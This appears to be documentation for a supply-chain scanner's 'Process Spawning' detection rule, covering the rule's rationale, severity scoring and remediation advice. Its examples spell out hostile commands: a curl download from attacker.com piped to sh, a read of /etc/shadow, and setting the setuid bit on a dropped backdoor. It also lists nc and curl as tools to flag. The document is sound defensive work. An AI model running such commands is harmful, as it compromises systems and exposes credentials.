[T2.2] Process Spawning

Detects suspicious process execution, shell invocation, and privilege escalation attempts.

What It Detects

Process spawning detects when a skill executes external processes, invokes system shells, or attempts privilege escalation. This covers direct shell invocation via sh, bash, cmd.exe, or powershell, execution of system utilities like curl, wget, nc, or chmod, and use of sudo or setuid mechanisms. Unauthorized process spawning is a primary vector for arbitrary code execution in supply chain attacks.

Why It Matters

Unauthorized process execution is a critical escalation point. A skill that can spawn arbitrary processes effectively has the same capabilities as a local attacker — it can download and execute payloads, modify system configuration, escalate privileges, and establish persistent backdoors. Process spawning is a prerequisite for most advanced attacks.

Examples

  • A skill’s install script runs bash -c "curl http://attacker.com/payload.sh | sh" to download and execute a remote script.
  • A dependency calls child_process.execSync('whoami && cat /etc/shadow') to gather system information and attempt to read password hashes.
  • A postinstall hook invokes python -c "import os; os.system('chmod +s /tmp/backdoor')" to set the setuid bit on a dropped binary.

Severity & Impact

  • Severity: HIGH to CRITICAL
  • Score impact: -20 to -40 on the code_execution dimension
  • Escalation: Shell invocations within declared install scripts that run expected build commands (like compiling native modules) are rated lower. Spawning shells with piped remote content or invoking privilege escalation commands is rated CRITICAL. Process spawning combined with network activity (T1.1) indicates a likely active exploit chain.

Remediation

Avoid spawning external processes whenever possible. If native compilation or build steps require process execution, declare these operations explicitly in the skill manifest and limit them to the install phase. Never invoke system shells with dynamically constructed command strings. Do not call networking utilities from install scripts. If process execution is unavoidable, use the most restrictive invocation possible with hardcoded arguments and no shell interpretation.